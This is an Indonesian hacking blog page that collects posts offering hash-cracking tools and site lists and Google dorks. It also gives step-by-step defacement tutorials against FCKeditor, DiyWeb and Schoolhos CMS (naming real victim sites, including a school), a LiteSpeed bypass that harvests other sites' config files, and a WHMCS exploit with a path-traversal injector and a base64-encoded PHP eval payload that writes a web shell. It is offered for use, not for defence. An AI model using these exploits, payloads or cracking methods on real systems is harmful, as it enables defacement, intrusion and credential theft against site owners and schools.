BloggerMates

FOLLOWERS

[ Categories ]

[ Followers ]

Image

[ Partner Link ]

[ Recent Comments ]

Arnoldi-Technology

[ Advertiser ]

Code HTML/Isi Widget kalian
Diberdayakan oleh Blogger.
Tampilkan postingan dengan label Hacking. Tampilkan semua postingan
Tampilkan postingan dengan label Hacking. Tampilkan semua postingan

Password Pro



Ketika bermain hacking,anda menemukan password yg susah untuk di decrypt.
Coba tool ini :

Hash yang disupport :

– MySQL
– MySQL5
– DES(Unix)
– MD4
– MD4(HMAC)
– MD4(Base64)
– MD5
– MD5(APR)
– MD5(Unix)
– MD5(HMAC)
– MD5(Base64)
– MD5(phpBB3)
– MD5(Wordpress)


– MD5_HMAC($salt,MD5_HMAC($salt,$pass))
– SHA-1
– SHA-1(HMAC)
– SHA-1(Base64)
– SHA-256
– SHA-384
– SHA-512
– SHA-256(PasswordSafe)
– Haval-128
– Haval-160
– Haval-192
– Haval-224
– Haval-256
– Tiger-128
– Tiger-160
– Tiger-192
– Whirlpool
– RAdmin v2.x
– Domain Cached Credentials
– md5($pass.$salt)
– md5($salt.$pass)
– md5(md5($pass))
– md5(md5(md5($pass)))
– md5(md5($pass).$salt)
– md5(md5($salt).$pass)
– md5($salt.md5($pass))
– md5($salt.$pass.$salt)
– md5(md5($salt).md5($pass))
– md5(md5($pass).md5($salt))
– md5($salt.md5($salt.$pass))
– md5($salt.md5($pass.$salt))
– md5($salt.md5($pass).$salt)
– md5(sha1(md5(sha1($pass))))
– md5($hex_salt.$pass.$hex_salt)
– md5($username.md5($pass).$salt)
– md5(md5($username.$pass).$salt)
– sha1($salt.$pass)
– sha1($username.$pass)
– sha1($username.$pass.$salt)
– sha1($salt.sha1($salt.sha1($pass))) 


Hash Joomla 1.0.13 keatas pake md5($pass.$salt)

Fitur programnya :
– Passwords recovery using the following methods:
• Preliminary attack
• Brute force attack (including distributed attack)
• Mask attack
• Simple dictionary attack
• Combined dictionary attack
• Hybrid dictionary attack
• Rainbow attack
– Recovery of passwords of up to 127-character length
– Recovery of passwords for incomplete hashes of any type
– User hash editor
– Searching data on the list of imported users
– Quick-add hash using a dialog box
– Quick-add hashes from Clipboard
– Quick-check current password for all imported users
– Support of character replacement tables for hybrid dictionary attack
– Unlimited number of dictionaries available for dictionary attack
– Unlimited number of tables available for Rainbow attack
– Unlimited number of servable users with hashes (in the licensed version) 


download : klik disini


Sumber

Free MD5 Decrypter, SHA1 Decrypter Hash Cracking Sites




How to Decrypt MD5 Hash

* http://www.md5-db.com/index.php
* http://plain-text.info/add/
* http://www.tmto.org/
* https://hashcracking.ru/
* http://hashcrack.com/
* http://www.cryptohaze.com/addhashes.php
* http://md5decryption.com/
* http://authsecu.com/decrypter-dechif...r-hash-md5.php
* http://hash.insidepro.com/
* http://md5decrypter.com/
* http://md5pass.info/
* http://crackfor.me/
* http://www.xmd5.org/
* http://socialware.ru/md5_crack.php
* http://md5.my-addr.com/md5_decrypt-m...coder_tool.php
* http://passcracking.com
* http://www.md5this.com
* http://www.md5this.com/submit-your-hash/index.php
* http://md5.benramsey.com
* http://nz.md5.crysm.net
* http://us.md5.crysm.net
* http://www.xmd5.org
* http://gdataonline.com
* http://www.hashchecker.com
* http://passcracking.ru
* http://www.milw0rm.com/md5
* http://plain-text.info
* http://www.securitystats.com/tools/hashcrack.php
* http://www.schwett.com/md5/
* http://passcrack.spb.ru/
* http://shm.pl/md5/
* http://www.tydal.nu/article/md5-cr*ck/
* http://ivdb.org/search/md5/
* http://md5.netsons.org/
* http://md5.c.la/
* http://www.jock-security.com/md5_database/?page=cr*ck
* http://c4p-sl0ck.dyndns.org/cracker.php
* http://www.blackfiresecurity.com/tools/md5lib.php


How to Decrypt SHA1 Hash 

* http://passcrack.spb.ru/
* http://www.hashreverse.com/
* http://rainbowcrack.com/
* http://www.md5encryption.com/
* http://www.shalookup.com/
* http://md5.rednoize.com/
* http://c4p-sl0ck.dyndns.org/cracker.php
* http://www.tmto.org/
* http://linardy.com/md5.php
* http://www.gdataonline.com/seekhash.php
* https://www.w4ck1ng.com/cracker/
* http://search.cpan.org/~blwood/digest-md5-reverse-1.3/
* http://shm.pl/md5/
* http://www.neeao.com/md5/
* http://md5.benramsey.com/
* http://www.md5decrypt.com/
* http://md5.khrone.pl/
* http://www.csthis.com/md5/index.php
* http://www.md5decrypter.com/
* http://www.md5encryption.com/
* http://www.md5database.net/
* http://md5.xpzone.de/
* http://www.hashreverse.com/
* http://alimamed.pp.ru/md5/
* http://md5crack.it-helpnet.de/index.php?op=add
* http://shm.hard-core.pl/md5/
* http://rainbowcrack.com/
* http://md5.c.la/
* http://www.md5-db.com/index.php
* http://md5.idiobase.de/
* http://md5search.deerme.org/
* http://sha1search.com/


So friends, I hope above sites will help you to decrypt MD5 and SHA1 hash and SHA1 / MD5 password using above sites.

Enjoy MD5 and MD4 decrypter sites to decrypt MD5 and MD4 password hashes...


Sumber

Deface dengan Teknik Remote File Upload Exploit Vulnerability


Ngga ada habis-habisnya kalo ngebahas soal hacking, Setiap hari berbagai macam exploit ditemukan. Dan sekarang saya akan share cara deface website lagi sob. Tutorial ini saya dapat dari grup facebook Hacker Indonesia. Namun karena masih banyak yang bingung, disini saya akan jelaskan beserta gambarnya.

http://cirebon-cyber4rt.blogspot.com/2012/08/deface-dengan-teknik-remote-file-upload.html
We Are Anonymous !

Ok, daripada lama-lama cerita, mending kita langsung aja ketutorialnya sob, Berikut Tutorial Deface dengan Teknik Remote File Upload Exploit Vulnerability :

Dork :
inurl:/editor/editor/filemanager/
inurl:/HTMLEditor/editor/"

1). Masukan salah satu dork diatas ke Seacrh Enginee Google.

http://cirebon-cyber4rt.blogspot.com/2012/08/deface-dengan-teknik-remote-file-upload.html

2). Pilih salah satu website sebagai target.

http://cirebon-cyber4rt.blogspot.com/2012/08/deface-dengan-teknik-remote-file-upload.html

3). Tampilan Webitenya nanti akan seperti ini.

http://cirebon-cyber4rt.blogspot.com/2012/08/deface-dengan-teknik-remote-file-upload.html

4). Kemudian kode ini :

editor/editor/filemanager/browser/mcpuk/images/icons/32/

5). Ganti dengan kode ini, Lalu enter :

editor/editor/filemanager/upload/test.html

http://cirebon-cyber4rt.blogspot.com/2012/08/deface-dengan-teknik-remote-file-upload.html

6). Jika sudah, kamu ubah pada Select the "File Uploader" to use: Ubah dari ASP menjadi PHP.

7). Kemudian kamu klik Choose File, kamu pilih salah satu file HTML deface'an kamu.

http://cirebon-cyber4rt.blogspot.com/2012/08/deface-dengan-teknik-remote-file-upload.html

8). Lalu klik Send it to the Server.

http://cirebon-cyber4rt.blogspot.com/2012/08/deface-dengan-teknik-remote-file-upload.html

9). Jika berhasil nanti akan muncul notice jika file yang kamu upload berhasil tanpa eror, dan pada kotak ( Upload File URL ) akan memberikan patch dimana file kamu berada.

http://cirebon-cyber4rt.blogspot.com/2012/08/deface-dengan-teknik-remote-file-upload.html

10). Copykan saja file yang ada di ( Upload File URL ) lalu taruh dibelakang site target, jadi nanti akan terlihat seperti ini :

http://www.tysk.ee/failid/Image/idulfitri(1).html

Screenshot :

http://cirebon-cyber4rt.blogspot.com/2012/08/deface-dengan-teknik-remote-file-upload.html

14 Hacker Terbaik di Dunia

Hacker adalah orang yang mempelajari, menganalisa, dan selanjutnya bila menginginkan, bisa membuat, memodifikasi, atau bahkan mengeksploitasi sistem yang terdapat di sebuah perangkat seperti perangkat lunak komputer dan perangkat keras komputer seperti program komputer, administrasi dan hal-hal lainnya , terutama keamanan.

Berikut beberapa profile 14 Hacker Terbaik Dunia untuk saat ini :

1. Kevin Mitnick
Kevin adalah hacker pertama yang wajahnya terpampang dalam
poster “FBI Most Wanted”.
Kevin juga seorang “Master of Deception” dan telah menulis buku yang berjudul “The Art of Deception”.
Buku ini menjelaskan berbagai teknik social engineering untuk mendapatkan akses ke dalam sistem.

2. Linus Torvalds
Seorang hacker sejati, mengembangkan sistem operasi Linux yang merupakan gabungan dari “LINUS MINIX”.
Sistem operasi Linux telah menjadi sistem operasi “standar” hacker.
Bersama Richard Stallman dengan GNU-nya membangun Linux versi awal dan berkolaborasi dengan programmer, developper dan hacker seluruh dunia untuk mengembangkan kernel Linux.

3. John Draper
Penemu nada tunggal 2600 Herz menggunakan peluit plastik yang merupakan hadiah dari kotak sereal.
Merupakan pelopor penggunaan nada 2600 Hz dan dikenal sebagai Phone Phreaker (Phreaker, baca: frieker)
Nada 2600 Hz digunakan sebagai alat untuk melakukan pemanggilan telepon gratis.
Pada pengembangannya, nada 2600 Hz tidak lagi dibuat dengan peluit plastik, melainkan menggunakan alat yang disebut “Blue Box”.

4. Mark Abene
Sebagai salah seorang “Master of Deception” phiber optik, menginspirasikan ribuan remaja untuk mempelajari sistem internal telepon negara. Phiber optik juga dinobatkan sebagai salah seorang dari 100 orang jenius oleh New York Magazine.
Menggunakan komputer Apple , Timex Sinclair dan Commodore 64.
Komputer pertamanya adalah Radio Shack TRS-80 (trash-80).

5. Robert Morris
Seorang anak dari ilmuwan National Computer Security Center yang merupakan bagian dari National Security Agencies (NSA).
Pertama kali menulis Internet Worm yang begitu momental pada tahun 1988.
Meng-infeksi ribuan komputer yang terhubung dalam jaringan.

6. Richard Stallman
Salah seorang “Old School Hacker”, bekerja pada lab Artificial Intelligence MIT.
Merasa terganggu oleh software komersial dan dan hak cipta pribadi.
Akhirnya mendirikan GNU (baca: guhNew) yang merupakan singkatan dari GNU NOT UNIX.
Menggunakan komputer pertama sekali pada tahun 1969 di IBM New York Scintific Center saat berumur 16 tahun.

7. Kevin Poulsen
Melakukan penipuan digital terhadap stasiun radio KIIS-FM, memastikan bahwa ia adalah penelpon ke 102 dan memenangkan porsche 944 S2.

8. Ian Murphy
Ian Muphy bersama 3 orang rekannya, melakukan hacking ke dalam komputer AT&T dan menggubah seting jam internal-nya.
Hal ini mengakibatkan masyarakat pengguna telfon mendapatkan diskon “tengah malam” pada saat sore hari, dan yang telah menunggu hingga tengah malam harus membayar dengan tagihan yang tinggi.

9. Vladimir Levin
Lulusan St. Petersburg Tekhnologichesky University.
Menipu komputer CitiBank dan meraup keuntungan 10 juta dollar.
Ditangkap Interpol di Heathrow Airport pada tahun 1995

10. Steve Wozniak
Membangun komputer Apple dan menggunakan “blue box” untukkepentingan sendiri.

11. Tsutomu Shimomura
Berhasil menangkap jejak Kevin Mitnick.

12. Dennis Ritchie dan Ken Thomson
Dennis Ritchie adalah seorang penulis bahasa C, bersama Ken Thomson menulis sistem operasi UNIX yang elegan.

13. Eric Steven Raymond
Bapak hacker. Seorang hacktivist dan pelopor opensource movement.
Menulis banyak panduan hacking, salah satunya adalah: “How To Become A Hacker” dan “The new hacker’s Dictionary”.
Begitu fenomenal dan dikenal oleh seluruh masyarakat hacking dunia.
Menurut Eric, “dunia mempunyai banyak persoalan menarik dan menanti untuk dipecahkan”.

14. Johan Helsingius
Mengoperasikan anonymous remailer paling populer didunia.

Sumber

[PHP] TOOLS JOOMLA BRUTE, PORT SCANNER, WP BRUTE, DLL



Tools ini di kembangkan oleh salah satu anggota devilzc0de yang bernamapoticous menggunakan bahasa pemrograman PHP, tools ini sangat cocok bagi kalian yang suka melakukan pentest pada sebuah web.
mantap dah om Poti mantap

Fiturnya :
  1. Wordpress Brute Force
  2. Joomla Brute Force
  3. Reverse IP Lookup
  4. Admin Finder (Kalo ini katanya punyanya ditatompel, mahokers dari DC   piss  om)
  5. Port Scanner
  6. My IP
  7. Phiser (Phising Maker)


Oh iya jangan pernah mencoba untuk upload script ini di 000webhost atau idhostinger wew
ga bakalan work  prustasi

DIYWEB ADMIN BYPASS DAN FILE UPLOAD VULNERABILLITY

Exploit for DiyWeb File Upload Vulnerabillity

First, dorking yeah ...

Dork : Power by DiyWeb
inurl:/template.asp?menuid=
Exploit :
diyweb/menu/admin/image_manager.asp
diyweb/menu/admin/AspFIleImg/uploadtester.asp 
PoC :
http://victim.com/diyweb/menu/admin/image_manager.asp
http://victim.com/diyweb/menu/admin/AspFIleImg/uploadtester.asp

File will be upload to http://victim.com/Images/yourfilehere.php

PS: If you can't upload shell with exstension .phpyou can using tamper data or life http headers (AddOn Mozzila)


Sumber

SCHOOLHOS CMS EXPLOIT | .SCH.ID


Siang,
Tools ini sebenernya udah agak lama ane buat, tapi baru berani ngelepasnya sekarang :) (karena banyak yang tanya, "gimana sih cara deface web .sch.id itu mas?" | mungkin maksudnya "gimana cara deface web sekolahan?")
Sebenernya exploit schoolhos (Salah satu CMS sekolah yang menawarkan banyak fitur.
Alamat webnya : http://schoolhos.com/) udah lama, ga ada bedanya sih, cuman yang ini ane buat lebih simple dan lebih mudah dalam penggunaan :)

Tools : http://reyog-tools.net/tools/Schoolho.../
Dork intext:Schoolhos Free Open Source CMS



HOW TO USE THIS TOOL
(Ane tambahin karena masih banyak user yg ga ngerti/bingung cara pakenya.)

1. Pertama kita dork dulu intext:Schoolhos Free Open Source CMS di google.
2. Cari targetnya contoh (http://smkn1-pasuruan.sch.id/) dan kemudian masukin target di form. (seperti gambar di bawah ini)


3. Kemudian pilih shell anda dan upload.
4. Tunggu loadingnya, kalo berhasil maka akan di redirect ke halaman awal/index website smkn1-pasuruan.
5. Dan untuk memastikan shell terupload/tidak langsung coba buka
http://smkn1-pasuruan.sch.id/file/materi/namashell.php

CARA BYPASS LITESPEED




Ane jelasin sedikit fungsi-fungsi file yang nanti akan kalian download
  1. grab.cc  {fungsinya untuk mengumpulkan file config yang berada dalam 1 rumah}
  2. lsweb.pl {fungsinya untuk mengumpulkan domain yang ada di tetangga, kan lucu masa cuman config doang gada webnya wwkk==> sebenernya fitur ini sudah disediakan di Symlink}
  3. xxwp.php {WP indexer, yaitu sebuah file php untuk merubah Index & password admin wp dengan hanya memasukan file config databasenya saja}
  4. xxjomm.php {fungsinya seperti xxwp.php hanya saja ini untuk joomla}
  5. .htacces {pasti sudah tau semua, ini digunakan untuk pendamping grab.cc supaya bisa berjalan

Caranya :

1. Buat folder baru namanya terserah (contoh disini : sempak)
2. Kita upload grab.cc ke folder  sempak tadi
3. Kemudian di chmod ke 0755 (nge-chmod grab.cc nya sekali aja, kemarin ane ulangi karena ada error)
4. Upload .htaccess
5. Buka melalui web browser (untuk memastikan bahwa grab.cc sudah berjalan dengan baik/belum)
6. Tulis cat /etc/passwd > nama di shell.
7. Akan muncul folder lagu baru berisi "nama"
8. Buka, copy semua isinya ke dalam kolom yang ada di grab.cc
9. Buka lagi folder sempak, akan muncul banyak file .txt
10. Itu Config website yang 1 rumah dengan ente
11. PWNED
(gunakan xxwp.php dan xxjm.php jika menjumpai config wordpress/joomla, supaya lebih praktis)

Untuk download Filenya (sudah ane sertain Vidionya buat PoC) Klik disini :)
Happy hacking :P


 THE PASSWORD IS : war0kgantengsekalinull

SQL INJECTION SCANNER



Binggo good evening !!
SQL Injection Scanner [Writtlen in PHP language programing].
You just need to upload this script and don't forget curl() php in webserver must be on/enable!!
Demo Here
Original script

Happy SQLing

Sumber

Cara Shutdown Komputer Orang Via LAN


Cara Shutdown Komputer Orang Lain Via LAN. Langsung saja Mari Kita Simak dan Coba.

Berikut adalah Caranya :
  • Pada komputer, klik Start è Run, ketik  "cmd" (Tanpa tanda petik ) pada kotak isian 
  • Setelah itu muncul kotak berwarna hitam, lalu ketikan SHUTDOWN.EXE (spasi) -i (spasi) -m dan kemudian TekanEnter
 
  • Maka akan muncul kotak di samping yang bernama "Remote Shutdown Dialog" 
 
  • Lalu klik "ADDè untuk menambahkan IP target or nama target di LAN, atau klik "Browse" untuk mencari otomatis 
  • Anda bisa tentukan apakah di shutdown, restart, or Log off. 
  • Tentukan time yang cocok buat deat time-nya komputer itu beraksi .
  • Anda bisa tambakan other (Planned), Ini dimaksudkan agar si user lawan mengira kalo ini ulah server yang lagi maintenance. 
  • Kirim kan pesan terakhirmu ke komputer orang di COMMENTContoh: Kasihan Dech Lo… Haha :D 
  • Kemudian tunggu Reaksinya… 

Tutor HAck Whmcs



Sebelum kita Belajar udah pada tau belum Whmcs itu apa ?
WHMCS adalah suatu script yang sekarang paling dipakai oleh banyak kalangan webhoster
karena dengan memanage yang mudah.
WHMCS juga adalah sebuah billing yang berfungsi untuk pembuatan account hosting,
reseller,vps maupun dedicated.
WHMCS bisa dikatakan billing paling bagus untuk saat ini dan bisa dikatakan billing nomor 1
, WHMCS melebihi billing2 yang lain seperti ModernBill,AcountLab ++ dan lainnya.
Fitur WHMCS juga boleh dikatakan hampir komplit untuk urusan memanaged hosting, anda
akan di manjakan dengan BILLING WHMCS ini ..
Oke Kita Mulai Siapin Bahan Bahan nya :
1.Compi ( Tentu saja )
2.kopi ( biar gk ngantuk :v ) bisa juga di ganti dengan yang lain bila tidak suka kopi :D
3.Cemilan
4.terserah kalian mau nambahin apaan :D

Hack Whmcs Itu Ada 2 Cara :
1 . Dengan Metode Submitticet .
2 . Dengan Metode Exploit ..
Dork :1. inurl:whmcs/cart.php?a=

Dork Lengkap Untuk Teknik Submitticket:
  1. intext:Powered by WHMCompleteSolution
  2. inurl:submitticket.php intext:Powered by WHMCompleteSolution
  3. inurl:clients/submitticket.php intext:Powered by WHMCompleteSolution
  4. inurl:client/submitticket.php intext:Powered by WHMCompleteSolution
  5. inurl:clientsarea/submitticket.php intext:Powered by WHMCompleteSolution
  6. inurl:clientarea/submitticket.php intext:Powered by WHMCompleteSolution
  7. inurl:crm/submitticket.php intext:Powered by WHMCompleteSolution
  8. inurl:cp/submitticket.php intext:Powered by WHMCompleteSolution
  9. inurl:manage/submitticket.php intext:Powered by WHMCompleteSolution
  10. inurl:member/submitticket.php intext:Powered by WHMCompleteSolution
  11. inurl:members/submitticket.php intext:Powered by WHMCompleteSolution
  12. inurl:billing/submitticket.php intext:Powered by WHMCompleteSolution
  13. inurl:billings/submitticket.php intext:Powered by WHMCompleteSolution
  14. inurl:support/submitticket.php intext:Powered by WHMCompleteSolution
  15. inurl:help/submitticket.php intext:Powered by WHMCompleteSolution
  16. inurl:secure/submitticket.php intext:Powered by WHMCompleteSolution
  17. inurl:store/submitticket.php intext:Powered by WHMCompleteSolution
  18. inurl:whmcs/submitticket.php intext:Powered by WHMCompleteSolution
  19. inurl:log/submitticket.php intext:Powered by WHMCompleteSolution
  20. inurl:myaccount/submitticket.php intext:Powered by WHMCompleteSolution
  21. inurl:orders/submitticket.php intext:Powered by WHMCompleteSolution
  22. inurl:order/submitticket.php intext:Powered by WHMCompleteSolution
  23. inurl:portal/submitticket.php intext:Powered by WHMCompleteSolution
  24. inurl:mc/submitticket.php intext:Powered by WHMCompleteSolution
  25. inurl:office/submitticket.php intext:Powered by WHMCompleteSolution
  26. inurl:submitticket.php site:com intext:Powered by WHMCompleteSolution
  27. inurl:submitticket.php site:org intext:Powered by WHMCompleteSolution
  28. inurl:submitticket.php site:net intext:Powered by WHMCompleteSolution
  29. inurl:submitticket.php site:info intext:Powered by WHMCompleteSolution
  30. inurl:".*/*/submitticket.php" intext:Powered by WHMCompleteSolution
  31. inurl:".*/submitticket.php"  
Silahkan pilih salah satu dork tersebut , Jangan malas googling ya mas bro :D

 #Injector : cart.php?a=test&templatefile=../../../
configuration.php Kita Bahas HAck WHMCS Submittiket Dullu ya .. _Ini Exploit nya . Taro Di Subject ya .->{php}eval(base64_decode('JGM9YmFzZTY0X2RlY29kZSgiUEQ5d2FIQU5DbWxtS0dsemMyVjBLQ1JmVUU5VFZGc25VM1ZpYldsMEoxMHBLWHNOQ2lBZ0lDQWtabWxzWldScGNpQTlJQ0lpT3lBTkNpQWdJQ0FrYldGNFptbHNaU0E5SUNjeU1EQXdNREF3SnpzTkNnMEtJQ0FnSUNSMWMyVnlabWxzWlY5dVlXMWxJRDBnSkY5R1NVeEZVMXNuYVcxaFoyVW5YVnNuYm1GdFpTZGRPdzBLSUNBZ0lDUjFjMlZ5Wm1sc1pWOTBiWEFnUFNBa1gwWkpURVZUV3lkcGJXRm5aU2RkV3lkMGJYQmZibUZ0WlNkZE93MEtJQ0FnSUdsbUlDaHBjM05sZENna1gwWkpURVZUV3lkcGJXRm5aU2RkV3lkdVlXMWxKMTBwS1NCN0RRb2dJQ0FnSUNBZ0lDUmhZbTlrSUQwZ0pHWnBiR1ZrYVhJdUpIVnpaWEptYVd4bFgyNWhiV1U3RFFvZ0lDQWdJQ0FnSUVCdGIzWmxYM1Z3Ykc5aFpHVmtYMlpwYkdVb0pIVnpaWEptYVd4bFgzUnRjQ3dnSkdGaWIyUXBPdzBLSUNBTkNtVmphRzhpUEdObGJuUmxjajQ4WWo1RWIyNWxJRDA5UGlBa2RYTmxjbVpwYkdWZmJtRnRaVHd2WWo0OEwyTmxiblJsY2o0aU93MEtmUTBLZlEwS1pXeHpaWHNOQ21WamFHOG5EUW84Wm05eWJTQnRaWFJvYjJROUlsQlBVMVFpSUdGamRHbHZiajBpSWlCbGJtTjBlWEJsUFNKdGRXeDBhWEJoY25RdlptOXliUzFrWVhSaElqNDhhVzV3ZFhRZ2RIbHdaVDBpWm1sc1pTSWdibUZ0WlQwaWFXMWhaMlVpUGp4cGJuQjFkQ0IwZVhCbFBTSlRkV0p0YVhRaUlHNWhiV1U5SWxOMVltMXBkQ0lnZG1Gc2RXVTlJbE4xWW0xcGRDSStQQzltYjNKdFBpYzdEUXA5RFFvL1BpQT0iKTsNCiRmaWNoaWVyID0gZm9wZW4oJ2Rvd25sb2Fkcy9pbmRleHgucGhwJywndycpOw0KZndyaXRlKCRmaWNoaWVyLCAkYyk7DQpmY2xvc2UoJGZpY2hpZXIpOw=='));exit;{/php}

Oke sekarang Buka Google taruh Dork .
Yang Diatas Untk Teknik Submitticket Kalo Sudah Buka Web yg Terpilih
contoh:

Jika sudah masuk Liat SS nya lagi:

Nah kita sukses Buat / daftar Submitticket , Sekarang Tinggal buka deh .
contoh:
www.domain.co/whmcs/submitticket.php?step=2&deptid=1
Di ubah menjadi :
www.domaint.co/whmcs/downloads/indexx.php
Hasil jadi seperti ini 


Upload Dehh Shell Kalian . contoh : www.domain.co/whmcs/downloads/indexx.php Jadi : www.domain.co/whmcs/downloads/namashell.php 
SS:

sekian dulu ya , semoga bermanfaat sobat ^_^

Thanks to : Java defacer